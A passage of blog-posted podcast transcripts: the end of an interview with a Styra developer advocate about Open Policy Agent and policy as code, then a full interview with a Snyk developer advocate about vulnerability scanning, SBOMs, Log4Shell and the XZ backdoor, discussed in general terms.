But it doesn't stop there. Basically, anywhere you can define rules, you can define policy. So other common use cases are policy for infrastructure, where you want to say: I don't want to allow pods to run in my Kubernetes cluster unless they have a well-defined security context, or if they use mounts of certain types, and so on. So you basically define the rules for your infrastructure. And this could be things like Terraform plans, Kubernetes resource manifests, or simply just JSON and YAML files on disk. So there are many ways, and many places, where you might want to enforce policy. And the whole idea behind OPA is that you have one unified way of doing it. There are many policy engines out there, and most of them do this for one particular use case. So there might be a policy engine that does authorization and many others that do infrastructure and so on. But that all means that you're still going to end up with this problem where policy is scattered all over the place; it looks different, it logs differently, and so on. With OPA, you have one unified way of doing this and of working with policy across your whole stack and organization. That is the idea behind OPA.

Chris Engelbert: So that means if I’m thinking about something like simplyblock being a cloud native block storage, I could prevent services from mounting our block devices through the policies, right? So something like, okay, cool.

Anders Eknert: Right

Chris Engelbert: You mentioned authorization; I guess that is probably the most common thing people think about with policy management in general. What I find interesting is that, in the past, the actual policies, the rules for permission configuration, often already lived in a configuration file. But with OPA, you kind of made this a first-class citizen. It shouldn't be in your code; here's the framework that you can just drop into, or drop in front of, your application. It's not even in the application itself.

Anders Eknert: No, I guess it depends, but most commonly you’ll have like a separate policy repo where that goes. And of course, a benefit of that is like, we’re not giving up on code. Like we still want to treat policy as code. We want to be able to test it. We want to be able to review it. We want to work with all of these things like lint it or what not. We want to work with all these good tools and processes that we kind of established for any development. We want to kind of piggyback on that for policy just as we do for anything else. So if you want to change something in a policy, the way you do that is you submit a pull request. It’s not like you need to call a manager or you need to submit a form or something. That is how it used to be, right? But we want to, as developers, we want to work with these kinds of things like we work with any other type of code.

Chris Engelbert: Right. So how does it look like from a developer’s point of view? I mean, you can use it to, I think automatically create credentials for something like Postgres. Or is that the DAS tool? Do you need one of the enterprise tools for that?

Anders Eknert: No, yeah, creating credentials, I guess you could definitely use OPA for that. But I think in most cases, what you use OPA for is basically to make decisions that are, most commonly, yes or no. 'So should we allow these credentials?' would probably be a better use case for OPA. 'No, we should not allow them because they're not sufficiently secure,' or what have you. But yeah, you can use OPA and Rego, the policy language, for a whole lot of things, and a whole lot of things that it might not have been designed for initially. As an example, there's this linter for Rego, called Regal, that I have been working on for the past year or so. And that linter itself is written mostly in Rego. So we kind of use Rego to define the rules of what you can do in Rego.

Chris Engelbert: Like a small exception.

Anders Eknert: Yeah, yeah. There’s a lot of that.

Chris Engelbert: All right. I mean, you know that your language is good when you can build your own stuff in your own language, right?

Anders Eknert: Exactly.

Chris Engelbert: So coming back to the original question, like what does it look like from a developer’s point of view if I want to access, for example, a Postgres database?

Anders Eknert: Right. So the way OPA works, it basically acts as a layer in between. So you probably have a service between your database and your user or another service. So rather than having that user or service go right to the database, they’d query that service for access. And in that service, you’d have an integration with OPA, either with OPA running as another service or running embedded inside of that service. And that OPA would determine whether access should be allowed or not based on policy and data that it has been provided.
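From the service's side, that integration could be sketched like this, assuming an OPA instance listening on localhost:8181 with a policy loaded under a hypothetical `authz` package. The endpoint shape follows OPA's documented Data API: POST to `/v1/data/<path>` with the query document wrapped under `"input"`, answered as `{"result": <value>}`:

```python
# Minimal service-side sketch (stdlib only) of asking a local OPA for a decision.
import json
import urllib.request

OPA_URL = "http://localhost:8181/v1/data/authz/allow"  # hypothetical policy path

def build_input(user: str, action: str, resource: str) -> dict:
    # OPA's Data API expects the query document under an "input" key.
    return {"input": {"user": user, "action": action, "resource": resource}}

def is_allowed(user: str, action: str, resource: str) -> bool:
    req = urllib.request.Request(
        OPA_URL,
        data=json.dumps(build_input(user, action, resource)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        # "result" is absent when the decision is undefined; treat that as
        # a deny, which is the safe default.
        return json.load(resp).get("result", False) is True

# The payload construction alone, without a running OPA:
assert build_input("alice", "read", "orders") == {
    "input": {"user": "alice", "action": "read", "resource": "orders"}
}
```

The actual yes/no, of course, depends entirely on the Rego policy and data loaded into that OPA instance.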

Chris Engelbert: Right. Okay, got it, got it. I actually thought that, maybe I’m wrong because I’m thinking one of the enterprise features or enterprise products, I thought it was its own service that handles all of that automatically, but maybe I misunderstood to be honest. So there are, as you said, there’s OPA enterprise and there is DAS, the declarative authorization service.

Anders Eknert: Yeah, yeah, that’s right. You got it right. I remembered right.

Chris Engelbert: So maybe tell us a little bit about those. Maybe I’m mixing things up here.

Anders Eknert: Sure. So I talked a bit about OPA, and OPA acts as the distributed component, or the decision point. So that's where the decisions are made. OPA is going to tell the user or another service: should we allow this or not. And once you start to have tens or twenties or hundreds or thousands of these OPAs running in your cluster, if you have a distributed environment and you want to do zero-trust microservice authorization or whatnot, you're going to have hundreds or thousands of OPAs. So the problem that Styra DAS solves is essentially: how do we manage this at scale? How do I know which version of which policy is deployed in all these environments? How do I manage policy changes between dev, test, prod, and so on? It basically handles the whole policy lifecycle. We talked about testing before. We talked about things like auditing. How are these things logged? How can I search these logs? Can I use these logs to replay a decision and see: if I did change this, would it have an impact on the outcome, and so on?

So it’s basically the centralized component. If OPA is the distributed component, Styra DAS provides a centralized component which allows things like a security team or even a policy team to kind of gain this level of control that would previously be missing when you just let any developer team handle this on their own.

Chris Engelbert: So it’s a little bit like fleet management for your policies.

Anders Eknert: Yes, that is right.

Chris Engelbert: Okay, that makes sense. And the DAS specifically, that is the management control or the management tool?

Anders Eknert: Yeah, that it is.

Chris Engelbert: Okay.

Anders Eknert: And then the enterprise OPA is a drop-in replacement for OPA adding a whole bunch of features on top of it, like reduced memory usage, direct integrations with data sources, things like Kafka streaming data from Kafka and so on and so forth. So we provide commercial solutions both for the centralized part and the distributed part.

Chris Engelbert: Right, okay. I think now I remember where my confusion comes from. I think I saw OPA Enterprise and saw all the services which are basically source connectors. So I think you already mentioned Kubernetes before, but how does that work in the Kubernetes environment? I think you can, as you said, deploy it as its own service or run it embedded in microservices. How would that apply together somehow? I mean, we’re a cloud podcast.

Anders Eknert: Yeah, of course, of course. So in the context of Kubernetes, there are basically two use cases. The first one we kind of covered: it's authorization at the workload level, inside of the workloads. Our applications need to know that the user trying to do something is authorized to do so. In that context, you'd normally have OPA running as a sidecar, or in a gateway, or as part of an Envoy proxy or something like that. So it basically provides a layer on top, before any request hits an actual application.

Chris Engelbert: In the sense of user operated.

Anders Eknert: Yeah, exactly. So the next use case for OPA and Kubernetes is commonly admission control, where Kubernetes itself, or the Kubernetes API, is protected by OPA. So whenever you try to make a modification to Kubernetes, or to the database etcd, the Kubernetes API reaches out to OPA to ask: should this be allowed or not? So if you try to deploy a pod or a deployment or, I don't know, whatever kind of resource, OPA will be provided that resource. Again, it's just JSON or YAML. So anything that's JSON or YAML is basically what OPA has to work with. OPA doesn't even know what a Kubernetes resource is. It just sees: here's a YAML document, or here's a JSON document. Is this or that property that I expect in this JSON blob, and does it have the values that I need? If it doesn't, it's not approved, so we're going to deny that. So OPA basically just tells the Kubernetes API: no, this should not be allowed, and the Kubernetes API will enforce that. So the user will see that this was denied for this or that reason.
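A toy sketch of what such an admission check does, in plain Python rather than Rego. The request/response shape follows the Kubernetes AdmissionReview API; the rule itself, requiring a securityContext on every container, is just a hypothetical example:

```python
# Toy admission check: deny any pod with containers lacking a securityContext.
def review(admission_review: dict) -> dict:
    req = admission_review["request"]
    pod = req["object"]
    missing = [
        c["name"]
        for c in pod.get("spec", {}).get("containers", [])
        if "securityContext" not in c
    ]
    allowed = not missing
    response = {"uid": req["uid"], "allowed": allowed}
    if not allowed:
        response["status"] = {"message": f"containers without securityContext: {missing}"}
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "response": response}

ar = {"request": {"uid": "123", "object": {
    "spec": {"containers": [{"name": "app"}]}}}}
assert review(ar)["response"]["allowed"] is False
```

In the real setup, the Kubernetes API server sends this AdmissionReview document to OPA over a webhook and enforces whatever `allowed` value comes back.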

Chris Engelbert: So that means I can also use it in between any Kubernetes services, everything or anything deployed into Kubernetes, I guess, not just the Kubernetes API.

Anders Eknert: Yeah, anything you try and deploy, like for modifications, is going to have to pass through the Kubernetes API.

Chris Engelbert: That’s a really interesting thing. So I guess going back to the simplyblock use case, that would probably be where our authorization layer or approval layer would sit, basically either approving or denying the CSI deployment.

Anders Eknert: Yeah.

Chris Engelbert: Okay, that makes sense. So because we’re already running out of time, do you think that, or well, I think the answer is yes, but maybe you can elaborate a little bit on that. Do you think that authorization policies or policies in general became more important with the move to cloud? Probably more people have access to services because they have to, something like that.

Anders Eknert: Yeah, I'd say they were probably just as important back in the day. What really changed with the advent of cloud and this kind of automation is the level of scale that any individual engineer can work with. In the past, an infra engineer would perhaps manage 20 machines or something like that, while today they could manage thousands of machines or virtual machines in cloud instances or whatnot.

And once you reach that level of scale, there’s basically no way that you can do policy like manually, that you have a PDF document somewhere where it says like, you cannot deploy things unless these conditions are met. And then have engineers sit and try and make an inventory of what do we have here? And are we all compliant? That doesn’t work.

So that is basically the difference today from how policy was handled in the past. We need to automate every kind of policy check, just as we automated infrastructure with the cloud.

Chris Engelbert: Yeah, that makes sense. I think the scale is a good point. It was not something I thought about. My thought was more in the sense that you probably have much bigger teams than in the past, which also makes it much more complicated to manage policies, or to make sure that only the right people have access. And many times somebody gets access because somebody else is on vacation, and it never gets removed again. We all know how it worked in the past.

Anders Eknert: Yeah, yeah. And another difference today compared to 20 years ago: at least when I started working in tech, if you went to any larger company, they were like, 'Hey, we're doing Java here,' or 'We're doing .NET.' But if you go to those companies today, there's going to be Python, there's going to be Erlang, there's going to be some Clojure running somewhere. There's going to be so many different things.

This idea of team autonomy, of teams deciding for themselves what the best solution for any given problem is. I love that. It makes it so much more interesting to work in tech, but it also poses a huge challenge for anything that is security related, because anywhere you need to centralize or have some form of control, it's really, really hard. How do you audit something if it's in eight different programming languages? I can barely understand two of them. How would I do that?

Chris Engelbert: How do you make sure that all the policies are implemented? If a policy change happens, yeah, you're right, you have to implement it in multiple languages, and the descriptor language for the rules isn't the same. That's a very good point actually. And just because of time, I think I would have a million more questions, but there's one thing I always have to ask. What do you think is the next big thing in terms of cloud? In your case authorization policies, but also in the broader scheme of everything.

Anders Eknert: Yeah, sure. So I'd say, first of all, both identity and access control are kind of slow moving, and for good reasons. There's not going to be a revolutionary thing or a disruptive event that turns everything around. And I think that's basically where we want to be: we can rely on things not changing or updating too frequently or too dramatically.

So what the next big thing is: I still think this area where we decouple policy and work with it consistently across large organizations is the next revolutionary thing. There are definitely a lot of adopters already, but we're just at the start of this. And again, organizations don't just swap out how they do authorization or identity; that could take a decade or so. So I still think that policy as code, while it's starting to be an established concept, is still the next big thing. And that's why it's also so exciting to work in this space.

Chris Engelbert: All right, fair enough. At least you didn’t say automatic AI generation.

Anders Eknert: No, God no.

Chris Engelbert: That would have been really the next big thing. Now we’re talking. No, seriously. Thank you very much. That was very informative. I loved that. Yeah, thank you for being here.

Anders Eknert: Thanks for having me.

Chris Engelbert: And for the audience, next week, same time, same podcast channel, whatever you want to call that. Hope to hear you again or you hear me again. And thank you very much.

Key Takeaways

In this episode of simplyblock’s Cloud Commute Podcast, host Chris Engelbert welcomes Anders Eknert, a developer advocate and DevRel lead at Styra, the company behind the Open Policy Agent (OPA) project. The conversation dives into Anders’ background, Styra’s mission, and the significance of OPA in managing policies at scale.

Anders Eknert works as a Developer Advocate/DevRel at Styra, the company responsible for the Open Policy Agent (OPA) Project. He’s been with the company for 3.5 years and was previously involved in the OPA project at another company.

Styra created and maintains the OPA project and offers two key products around it: 1) Styra DAS, a commercial control plane for managing OPA at scale that handles the entire policy lifecycle, and 2) an enterprise distribution of OPA with a different runtime that consumes less memory, evaluates faster, connects to various data sources, etc. If OPA is the distributed component, Styra DAS is the centralized component.

OPA is a framework to build and run policies – a project for defining policies as code, decoupled from applications, for use cases like authorization, or policy for infrastructure. The idea behind OPA is that it allows a unified way of working with policy across your whole stack and organization.

In the context of Kubernetes, there are two key use cases: 1) authorization inside the workloads, where OPA can be deployed as a sidecar, in a gateway, or as part of an Envoy proxy; and 2) admission control, where the Kubernetes API is protected by OPA.

Anders also talks about the advent of the cloud and how policy automation has become essential due to the scale at which engineers operate today. He also discusses today's diverse programming environments and team autonomy, both of which necessitate a unified approach to policy management, making tools like OPA crucial.

Anders predicts that policy as code will continue to gain traction, offering a consistent and automated way to manage policies across organizations.

The post Policy Management at Cloud-Scale with Anders Eknert from Styra (video + interview) appeared first on simplyblock.

EP15: Policy Management at Cloud-Scale with Anders Eknert from Styra
Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk https://www.simplyblock.io/blog/automated-vulnerability-detection-throughout-your-pipeline-with-brian-vermeer-from-snyk-video/ Fri, 10 May 2024 12:12:16 +0000 https://www.simplyblock.io/?p=274 This interview is part of simplyblock's Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site. In this installment of the podcast, we're joined by Brian Vermeer (Twitter/X, Personal Blog) from Snyk, a cybersecurity company providing tooling to detect common […]

The post Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk appeared first on simplyblock.

This interview is part of simplyblock's Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment of the podcast, we're joined by Brian Vermeer (Twitter/X, Personal Blog) from Snyk, a cybersecurity company providing tooling to detect common code issues and vulnerabilities throughout your development and deployment pipeline. He talks about the necessity of multiple checks, the commonly found threats, and how important it is to rebuild images for every deployment, even if the code hasn't changed.

EP11: Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk

Chris Engelbert: Welcome back everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have yet another amazing guest with me, Brian from Snyk.

Brian Vermeer: That's always the question, right? How do you pronounce that name? Is it Snek, Snik, Synk? It's not Synk. It's actually Snyk. Some people say it differently, but I don't like that. And the founder wants it to be Snyk. And it's actually an abbreviation.

Chris Engelbert: All right, well, we’ll get into that in a second.

Brian Vermeer: So now you know, I mean.

Chris Engelbert: Yeah, we’ll get back to that in a second. All right. So you’re working for Snyk. But maybe we can talk a little bit about you first, like who you are, where you come from. I mean, we know each other for a couple of years, but…

Brian Vermeer: It's always hard to talk about yourself, right? I'm Brian Vermeer. I live in the Netherlands, just an hour and a half south of Amsterdam. I work for Snyk as a developer advocate. I've been a long-term Java developer, mostly a backend developer, for all sorts of jobs within the Netherlands. I'm a Java Champion and very active in the community, specifically the Dutch community, so the Netherlands Java user group and adjacent Java user groups, and I do some stuff in the virtual Java user group that we just relaunched. I try to be active, and I'm just a happy programmer.

Chris Engelbert: You’re just a happy programmer. Does that even exist?

Brian Vermeer: Apparently, I am the living example.

Chris Engelbert: All right, fair enough. So let’s get back to Snyk and the cool abbreviation. What is Snyk? What does it mean? What do you guys do?

Brian Vermeer: Well, what we do, first of all, we create security tooling for developers. So our mission is to make security an integrated thing within your development lifecycle. Like in most companies, it’s an afterthought. Like one security team trying to do a lot of things and we have something in the pipeline and that’s horrible because I don’t want to deal with that. If all tests are green, it’s fine. But what if we perceive it in such a way as, “Hey, catch it early from your local machine.” Just like you do with unit tests. Maybe that’s already a hard job creating unit tests, but hey, let’s say we’re all good at that. Why not perceive it in that way? If we can catch things early, we probably do not have to do a lot of rework if something comes up. So that’s why we create tooling for all stages of your software development lifecycle. And what I said, Snyk is an abbreviation. So now you know.

Chris Engelbert: So what does it mean? Or do you forget?

Brian Vermeer: So Now You Know.

Chris Engelbert: Oh!

Brian Vermeer: Literally. So now you know.

Chris Engelbert: Oh, that took a second.

Brian Vermeer: Yep. That takes a while for some people. Now, the thought behind that is that we started as a software composition analysis tool. People just bring in libraries, and they have no clue what they're bringing in and what kind of implications come with that. So we can do tests on that, we can report on that, we can make reports of that, and you can make the decisions. So now at least you know what you're getting into.

Chris Engelbert: Right. And I think with implications and stuff, you mean transitive dependencies. Yeah. Stuff like that.

Brian Vermeer: Yeah.

Chris Engelbert: Yeah. And I guess that just got worse with Docker and images and all that kind of stuff.

Brian Vermeer: I won't say it gets worse. I think we shifted the problem. I mean, we used to do this on bare metal machines as well, and those machines also had an operating system, right? So I'm not saying it's getting worse, but developers get more responsibility, because let's say we're doing DevOps, whatever that may mean. That's a job nowadays; ask 10 DevOps engineers what DevOps is, and you'll probably get a lot of answers about tooling. But apparently what we did is tear down the wall between old-fashioned development and getting things to production, the ops folks. So we're now responsible as a team for all of that. And now your container, your environment, your cluster, your code is all together in your Git repository. It's all code now, and the team creating it is responsible for it. So yes, it shifted the problem from separate teams to one team that needs to create and maintain everything. I don't think we're getting into worse problems. I think we're shifting the problems, and it's getting easier to get into problems. That's what I mean.

Chris Engelbert: Yeah. Okay. We've broadened the scope of where you could potentially run into issues. So the way it works is that Snyk, and I need to remember to say Snyk and not Synk, because now it makes sense.

Brian Vermeer: I’m okay with however you call it. As long as you don’t say sync, I’m fine. That’s, then you’re actually messing up letters.

Chris Engelbert: Yeah, sync is different. It's not awkward and it's not Worcester. Anyway. So that means the tooling is actually looking into, I think, the dependencies, the build environment, whatever ends up in your Docker container or your container image, let's say, since nobody's using Docker anymore, and all those other things. So basically everything along the build pipeline, right?

Brian Vermeer: Yeah, you can say that. Actually, we start at the custom code that you're writing, so we do static analysis on that as well. We might combine that with stuff that we know from your dependencies and transitive dependencies, like, "Hey, you bring in a Spring Boot starter that has a ton of implications on how many libraries come in. Are these affected? Yes or no, et cetera, et cetera." Then we go one layer deeper, to your container images, and let's say it's Docker because it's still the most commonly used, but whatever: any image is built on a base image, and you probably put some binaries in there. So what's in there? That's another shell around the whole application. And then, in the end, you get to the configuration for your infrastructure. That can go wrong by not having a security context, or by policies that are not set properly, or pods that you gave more privileges than you should have, because, "Hey, it works on my machine, right? Let's ship it." These kinds of things. So on all these four fronts, we try to provide tooling and test capabilities in such a way that you can choose how you want to utilize them: in a CI pipeline, on your local machine, in between, or as part of your build, whatever fits your needs. Instead of, "Hey, this needs to be part of your build pipeline, because that's how the tool works." I was a backend developer myself for a long time, and I was the person that was like, if we need to satisfy that tool, I will find a way around it.
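As a rough illustration of that infrastructure-configuration layer, here is a minimal Python sketch of the kind of rule an IaC scanner applies to a pod spec. A real scanner such as Snyk IaC ships far more rules; these two (missing securityContext, privileged mode) are just the ones mentioned in the conversation:

```python
# Simplified, hypothetical IaC check: flag containers with no
# securityContext and containers that run privileged.

def scan_pod_spec(spec: dict) -> list[str]:
    """Return human-readable findings for a pod spec dictionary."""
    findings = []
    for c in spec.get("containers", []):
        name = c.get("name", "?")
        sc = c.get("securityContext")
        if sc is None:
            findings.append(f"{name}: no securityContext set")
        elif sc.get("privileged"):
            findings.append(f"{name}: runs privileged")
    return findings

spec = {"containers": [
    {"name": "web", "securityContext": {"privileged": True}},
    {"name": "sidecar"},
]}
for finding in scan_pod_spec(spec):
    print(finding)
```

Running such checks locally or in CI, rather than only in a mandatory build gate, is exactly the "enabler instead of a wall" workflow described above.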

Chris Engelbert: Yeah, I hear you.

Brian Vermeer: Which defeats the purpose because, because at that point you’re only like checking boxes. So I think if these tools fit your way of working and implement your way of working, then you actually have an enabler instead of a wall that you bump into every time.

Chris Engelbert: Yeah, that makes a lot of sense. So that means, when you say you start at the code level, the simple and still most common things, like SQL injection issues, all that kind of stuff, are probably handled as well, right?

Brian Vermeer: Yeah. SQL injections, path traversal injections, cross-site scripting, all these kinds of things will get flagged, and if possible, we will give you remediation advice. And then we go levels deeper. You can almost say it's four different types of scanner that you can use in whatever way you want. Some people are like, no, I'm only using the dependency analysis stuff. That's also fine. It's just four different capabilities for basically four levels in your application, because it's no longer just your binary that you put in. It's more than that, as we just discussed.
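The SQL injection case is easy to demonstrate with Python's built-in sqlite3 module. The vulnerable variant builds the query by string concatenation; the remediation a static analyzer typically suggests is a parameterized query:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cr3t')")

user_input = "alice' OR '1'='1"  # attacker-controlled value

# Vulnerable: string concatenation lets the input rewrite the query,
# so the WHERE clause becomes always-true and every row matches.
rows_vulnerable = conn.execute(
    "SELECT name FROM users WHERE name = '" + user_input + "'"
).fetchall()

# Safe: a parameterized query treats the input as a plain value.
rows_safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (user_input,)
).fetchall()

print(rows_vulnerable)  # [('alice',)] -- the injection matched everything
print(rows_safe)        # [] -- nobody is literally named "alice' OR '1'='1"
```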

Chris Engelbert: So, when we look at the recent and not-so-recent past. I mean, we're both coming from the Java world. You said you were a Java programmer for a long time, and I am too. The Java world isn't necessarily known for massive CVEs. Except Log4Shell.

Brian Vermeer: Yeah, that was a big,

Chris Engelbert: Right? Yeah.

Brian Vermeer: The thing, I think, is that in the Java world it's either not so big or very big. There's no in-between, or at least it doesn't get the same amount of attention. But yeah, Log4Shell was a big one. And first of all, props to the folks that maintain that library, because I think there were only three active maintainers when the thing came out, and it's a small library that is used and consumed by a lot of bigger frameworks. So everybody was looking at them like they were doing a bad job, and it was just three guys maintaining it voluntarily.

Chris Engelbert: So, for the people that do not know what Log4Shell was: Log4j is one of the most common logging frameworks in Java, and there was a way to inject remote code and execute it with basically whatever permissions your process had. And as you said, a lot of people love to run their containers with root privileges. So there is your problem right there. But yeah, Log4Shell was, at least from what I can remember, probably the biggest CVE in the Java world ever since I joined.
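For context, the exploit abused Log4j's `${...}` lookup syntax: logging an attacker-supplied string like `${jndi:ldap://attacker.example/a}` made the logger fetch and execute remote code. Below is a deliberately naive detector for the basic pattern, as an illustration only; real scanners also catch obfuscated variants, and the actual fix was upgrading Log4j, not filtering input:

```python
import re

# Matches the simplest form of the Log4Shell exploit string, e.g.
# "${jndi:ldap://attacker.example/a}". Obfuscated variants such as
# "${${lower:j}ndi:...}" would slip past this simplistic check.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)

def looks_like_log4shell(user_input: str) -> bool:
    return bool(JNDI_PATTERN.search(user_input))

print(looks_like_log4shell("${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_log4shell("ordinary log message"))               # False
```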

Brian Vermeer: Maybe that one. But in 2017 we had the Apache Struts one that blew away our friendly neighborhood Equifax. But yeah.

Chris Engelbert: I'm not talking about Struts, because that was so long deprecated by that point in time. They deserved it. No, but seriously, true, the Struts one was also pretty big. But since we are recording this on April 3rd, there was a very, very interesting thing just two or three days ago, around April 1st. I think it was actually April 1st, because I initially thought it was an April Fools' joke, but unfortunately it was not.

Brian Vermeer: I think it was the last day of March though. So it was not.

Chris Engelbert: Maybe I just saw it on April 1st. To be honest, initially I thought, okay, that's a really bad April Fools' joke. So what we're talking about is the XZ issue. Maybe you want to say a few words about that?

Brian Vermeer: Well, let's keep it simple. The XZ issue is basically an issue in one of the tools that come with some Linux distributions. And long story short, I'm not sure if they already created exploits for it. I didn't actually try, because we've got folks doing the research. But apparently, because of that tool, you could do nasty stuff such as arbitrary code execution, or interfere with secure connections. And it comes with your operating system. So that means if you have a Docker image, or whatever image, based on a certain well-known Linux distribution, you might be infected, regardless of what your application does. And it's a big one. If you want to go deeper, there are tons of blogs by people that can explain what the actual problem was. But I think for the general developer: don't shut your eyes and think, it's not on my machine. It might be in your container, because you're using a now-outdated image.

Chris Engelbert: I think there are two things. First of all, I think it was found before it actually made it into any stable distribution, which is good. So if you're not using any of the self-built distributions, you're probably good. But what I found more interesting is that this backdoor was introduced by a person who had been working on the tool for quite a while, like over a year, basically gaining the trust of the actual maintainers and eventually sneaking stuff in. And that is why I think tools like Snyk, or, let's be blunt, some of the competitors, are so important. Because it's really hard to just follow all of the new CVEs, and sometimes they don't blow up this big, so you probably don't even hear about them. For that reason, it's really important to have those tools.

Brian Vermeer: I totally agree. I mean, as a development team, it is a side effect for you. You're building stuff, and you don't focus on manually checking whatever comes in and whether it's vulnerable or not. But you should be aware of these kinds of things, so when they come in, you can make appropriate choices. I'm not saying you have to fix it; that's up to you, your threat level, and whatever is going on in your company. But you need to be able to make these decisions based on accurate knowledge, and have the appropriate knowledge to actually make such a decision. And you don't want to manually hunt these things down. You want to be actively pinged when something happens to your application that might have implications for your security risk.

Chris Engelbert: Right. And from your own feeling: in the past, we mostly deployed on-prem installations or in private clouds, but with the shift to the public cloud, do we increase the risk factor? Do we increase the attack surface?

Brian Vermeer: Yes. The short answer is yes. There are more things that we have under our control as a development team, and we do not always have the necessary specialties within the team. So we're doing the best we can, but that means we've got multiple attack surfaces. Your connection with your application is one thing, but another is, if I can get into your container for some reason, I can use that. Even though some things in containers or in operating systems might not be directly exploitable, they can be part of a chain that causes a problem. So if there's one hole, I can get in and use certain objects or certain binaries in my chain of attacks and make it a domino effect, basically. So you're giving people more and more ammunition. And as we automate certain things, we do not always have the necessary knowledge about them, and that might become a bigger and bigger issue. Plus, there's the fast pace we're currently moving at. Like, tell me, 10 years ago, how were you deploying?

Chris Engelbert: I don’t know. I don’t remember. I don’t remember yesterday.

Brian Vermeer: Yeah. But I mean, probably not three times a day. 10 years ago, we were probably deploying once a month, and you had time to test, something like that. So it's a combination of doing it all within one team, which, yes, we should do, but also the fast pace at which we need to release nowadays. The whole continuous delivery and continuous deployment thing is part of this. If you're actually doing that, of course.

Chris Engelbert: Yeah, that's true. I think it would have been about every two weeks or so. You normally had one week of development, one week of bug fixing and testing, and then you deployed. Now you do something, you think it's ready, it runs through the pipeline, and in the best case it gets deployed immediately. If something breaks, you fix it. Or, in the worst case, you roll back if it's really bad.

Brian Vermeer: But on the other hand, say you're an application developer and you need to ship that stuff in a container. Do you touch your container, or rebuild your container, if your application didn't change?

Chris Engelbert: Yes.

Brian Vermeer: Probably a lot of folks won't, because, hey, some things didn't change. But it can be that the image you base your stuff upon, your base image, however you manage that, is company-wide, or you just pull something out of Docker Hub or whatever. That's another layer that might have changed, that might have been fixed, or might have had vulnerabilities found in it. So it's no longer, 'Hey, I didn't touch that application, so I don't have to rebuild.' Yes, you should, because other layers in that whole application changed.
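Brian's point can be reduced to a tiny decision rule: "did my code change?" is the wrong rebuild trigger, because the base image digest can move independently when the base is patched. The function below is an illustrative sketch with made-up field names, not any real tool's API:

```python
# Hypothetical rebuild decision: rebuild when EITHER the application
# content hash OR the resolved base image digest differs from the
# values recorded at the last build.

def needs_rebuild(last_build: dict, app_hash: str, base_digest: str) -> bool:
    return (last_build.get("app_hash") != app_hash
            or last_build.get("base_digest") != base_digest)

last = {"app_hash": "abc123", "base_digest": "sha256:aaa"}
print(needs_rebuild(last, "abc123", "sha256:aaa"))  # False: nothing moved
print(needs_rebuild(last, "abc123", "sha256:bbb"))  # True: base was patched
```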

Chris Engelbert: Right, right. And I think you brought up an important other factor. It might be that, in between the last deployment and now, a CVE has been found, or something else, right? So you want to make sure you test again. And then you have other programming languages, I'm not naming names, where you might get a different version of a dependency, which is slightly newer, when you do a new install, right? There are so many different things. Applications these days, even microservices, are so complex, because they normally need so many different dependencies, and it is hard to keep an eye on that. And that kind of brings me to the next question: how does Snyk play into something like an SBOM, the software bill of materials?

Brian Vermeer: Getting into the hype train of SBOMs. Well, it's not just a hype train. I mean, it's a serious thing. For folks that don't know, you can compare an SBOM to the ingredients and nutrition list for whatever you consume. What's in there? You have no clue; the nutrition facts on the package should say what's in it, right? That's how you should perceive an SBOM. If you create an artifact, you should create a suitable SBOM with it that basically says, 'Okay, I'm using these dependencies and these transitive dependencies, and maybe even these Docker containers or whatever. I'm using these things to create my artifact.' And a consumer of that artifact is then able to search through it. Say a CVE comes up, a new Log4Shell, let's make it big: 'Am I affected?' That's the first question a consumer, or somebody that uses your artifact, asks. And with an SBOM you have a standardized (well, there are three standards, but nevertheless a standardized) way of having that, and you make it at least machine-searchable to see if you are vulnerable or not. So how do we play into that? You can use our Snyk tooling to create SBOMs for your applications or for your containers; that's possible. We also have the capability to read SBOMs in, to see if they contain packages or artifacts with known vulnerabilities, so you can again take the appropriate measures. SBOMs are great from the consumer side, because we're talking about supply chains all the time: it's very clear whether the stuff that I got from the internet or from a supplier, that I build upon or that I'm using, contains problems, or contains potential problems when something new comes up. And yes, we have the capability of creating these SBOMs and scanning these SBOMs.
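As a minimal sketch of what "machine-searchable" means here, the snippet below walks a CycloneDX-style component list and reports anything on a known-vulnerable list. This is heavily simplified: real SBOMs carry package URLs (purls) and real matching uses version ranges from a vulnerability database, and the hard-coded `KNOWN_BAD` set is just a stand-in:

```python
# Simplified CycloneDX-style SBOM: a dict with a "components" list of
# {"name", "version"} entries.
sbom = {
    "bomFormat": "CycloneDX",
    "components": [
        {"name": "log4j-core", "version": "2.14.1"},
        {"name": "jackson-databind", "version": "2.15.0"},
    ],
}

# Stand-in for a vulnerability database lookup. log4j-core 2.14.1 is the
# classic Log4Shell-affected release discussed earlier in the episode.
KNOWN_BAD = {("log4j-core", "2.14.1")}

def affected(sbom: dict) -> list[str]:
    """Return 'name@version' for every component on the known-bad list."""
    return [
        f"{c['name']}@{c['version']}"
        for c in sbom.get("components", [])
        if (c["name"], c["version"]) in KNOWN_BAD
    ]

print(affected(sbom))  # ['log4j-core@2.14.1']
```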

Chris Engelbert: All right. We're basically out of time, but there's one more question I still want to ask. Where do you personally see the biggest trend? It could be related to Snyk, or to security in general.

Brian Vermeer: The biggest trend is the hype around AI nowadays. And that is definitely a thing. What people think is that AI is a suitable replacement for a security engineer. Yeah, I exaggerate now, but it's not, because we have demos where we let a well-known code assistant tool spit out vulnerable code, for instance. So I think the trend is two things. One is the whole software supply chain, whatever you pull in, you should look at. But the other thing is, if people are using AI, don't trust it blindly. And I think that goes for everything, both stuff in your supply chain and code generated by a code assistant. You should know what you're doing. It's a great tool, but don't trust it blindly, because it can also hallucinate and bring in stuff that you didn't expect if you are not aware of what you're doing.

Chris Engelbert: So yeah. I think that is a perfect closing. It can hallucinate things.

